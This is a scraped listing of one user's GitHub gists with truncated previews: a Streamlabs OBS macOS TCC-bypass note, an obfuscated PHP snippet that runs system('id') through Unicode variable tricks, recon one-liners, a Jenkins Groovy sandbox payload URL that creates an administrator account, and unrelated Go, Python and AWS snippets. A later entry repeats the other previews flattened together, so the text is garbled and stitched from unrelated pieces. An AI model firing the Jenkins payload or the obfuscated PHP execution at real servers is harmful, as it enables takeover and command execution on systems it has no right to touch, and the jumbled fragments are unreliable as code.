Rahul Nair 0xrnair

## _obs_tcc.md

      
              4 files
            
          
              1 fork
            
          
              0 comments
            
          
              8 stars
            
          
                theevilbit
                / _obs_tcc.md
            
            
              Last active
              August 3, 2021 22:14
            
              
                [StreamLabs OBS macOS TCC bypass]
              
          
    StreamLabs OBS macOS TCC bypass

The Streamlabs macOS thick client does have hardened runtime enabled, but specifically allows DYLD environment variables and also disables library validation, which kills the purpose of hardened runtime. Having these settings on the executable enables an attacker to inject custom DYLIB libraries into the application. This would allow an attacker to access data inside the app, and possibly gain persistence on a machine, beyond that, as StreamLabs has access to the microphone and camera a user would gain access to that once exploited.
We can see the wrong permissions with running the codesign utility:
csaby@bigsur ~ % codesign -dv --entitlements :- /Applications/Streamlabs\ OBS.app 
Executable=/Applications/Streamlabs OBS.app/Contents/MacOS/Streamlabs OBS
Identifier=com.streamlabs.slobs
Format=app bundle with Mach-O thin (x86_64)


## funny.php
/* system(id) */
<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>


<!--
  Explanation:
    - Some of the characters might look like alphanumeric, but they are Unicode characters.
    - 'ArrayΦ' <-> [].Φ
    - 1 <-> ![]
    - 'a' <-> ([].Φ)[![]+![]+![]]

## ejs.sh
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# using linkfinder
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}

# with file download (the new best one):
# but there is a bug if you don't provide a root url

## interfaces.go
package main

import "fmt"

func main() {
  s1 := &FakeStruct1{}
  runMethods(s1)
  s2 := &FakeStruct2{}
  runMethods(s2)
  s3 := &FakeStruct3{}

## usbip_barebones_demo.py
#!/usr/bin/env python3

from collections import namedtuple
import socket
import struct

usbip_user_op_common = namedtuple('usbip_user_op_common', 'version code status')
usbip_usb_device = namedtuple('usbip_usb_device', 'path busid busnum devnum speed idVendor idProduct bcdDevice bDeviceClass bDeviceSubClass bDeviceProtocol bConfigurationValue bNumConfigurations bNumInterfaces')

usbip_header_basic = namedtuple('usbip_header_basic', 'command seqnum devid direction ep')

## payload
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}

## https-server.py
#!/usr/bin/env python3

# Ported to Python 3 by Telmo "Trooper" (telmo.trooper@gmail.com)
#
# Original code from:
# http://www.piware.de/2011/01/creating-an-https-server-in-python/
# https://gist.github.com/dergachev/7028596
#
# To generate a certificate use:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

## a-recon-services-list-for-liveoverflow.md

      
              2 files
            
          
              15 forks
            
          
              0 comments
            
          
              36 stars
            
          
                EdOverflow
                / a-recon-services-list-for-liveoverflow.md
            
            
              Last active
              April 29, 2021 13:29
            
          
https://scans.io/
https://commoncrawl.org/
https://web.archive.org/ (For JS snippets this can be extremely handy. See killbox.sh below that was written for a HackerOne event.)
https://www.shodan.io/
https://opendata.rapid7.com/
https://www.virustotal.com/en/documentation/public-api/ (You can fetch previously-scanned URLs via the API.)
https://securitytrails.com/
https://threatcrowd.org/
https://dnsdumpster.com/
https://crt.sh/


## fetchall_athena.py
# Does NOT implement the PEP 249 spec, but the return type is suggested by the .fetchall function as specified here: https://www.python.org/dev/peps/pep-0249/#fetchall

import time
import boto3

# query_string: a SQL-like query that Athena will execute
# client: an Athena client created with boto3
def fetchall_athena(query_string, client):
    query_id = client.start_query_execution(
        QueryString=query_string,

## kube2iam_manual.md

      
              1 file
            
          
              8 forks
            
          
              2 comments
            
          
              40 stars
            
          
                snoby
                / kube2iam_manual.md
            
            
              Created
              January 18, 2018 22:22
            
              
                kube2iam a second manual
              
          
    kube2iam your security partner


Introduction
Setup kube2iam in your cluster
Setting up the Role in AWS

The Role


Trust Relationship
	/* system(id) */
	<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>


	<!--
	Explanation:
	- Some of the characters might look like alphanumeric, but they are Unicode characters.
	- 'ArrayΦ' <-> [].Φ
	- 1 <-> ![]
	- 'a' <-> ([].Φ)[![]+![]+![]]
	curl -L -k -s https://www.example.com \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]" \| awk -F '//' '{if(length($2))print "https://"$2}' \| sort -fu \| xargs -I '%' sh -c "curl -k -s \"%\" \| sed \"s/[;}\)>]/\n/g\" \| grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\|(\.(get\|post\|ajax\|load)\s\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" \| awk -F "['\"]" '{print $2}' \| sort -fu

	# using linkfinder
	function ejs() {
	URL=$1;
	curl -Lks $URL \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]*" \| sed -r "s/^src['\"]?[=:]['\"]//g" \| awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' \| sort -fu \| xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" \| xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
	}

	# with file download (the new best one):
	# but there is a bug if you don't provide a root url
	package main

	import "fmt"

	func main() {
	s1 := &FakeStruct1{}
	runMethods(s1)
	s2 := &FakeStruct2{}
	runMethods(s2)
	s3 := &FakeStruct3{}
	#!/usr/bin/env python3

	from collections import namedtuple
	import socket
	import struct

	usbip_user_op_common = namedtuple('usbip_user_op_common', 'version code status')
	usbip_usb_device = namedtuple('usbip_usb_device', 'path busid busnum devnum speed idVendor idProduct bcdDevice bDeviceClass bDeviceSubClass bDeviceProtocol bConfigurationValue bNumConfigurations bNumInterfaces')

	usbip_header_basic = namedtuple('usbip_header_basic', 'command seqnum devid direction ep')
	#!/usr/bin/env python3

	# Ported to Python 3 by Telmo "Trooper" (telmo.trooper@gmail.com)
	#
	# Original code from:
	# http://www.piware.de/2011/01/creating-an-https-server-in-python/
	# https://gist.github.com/dergachev/7028596
	#
	# To generate a certificate use:
	# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
	# Does NOT implement the PEP 249 spec, but the return type is suggested by the .fetchall function as specified here: https://www.python.org/dev/peps/pep-0249/#fetchall

	import time
	import boto3

	# query_string: a SQL-like query that Athena will execute
	# client: an Athena client created with boto3
	def fetchall_athena(query_string, client):
	query_id = client.start_query_execution(
	QueryString=query_string,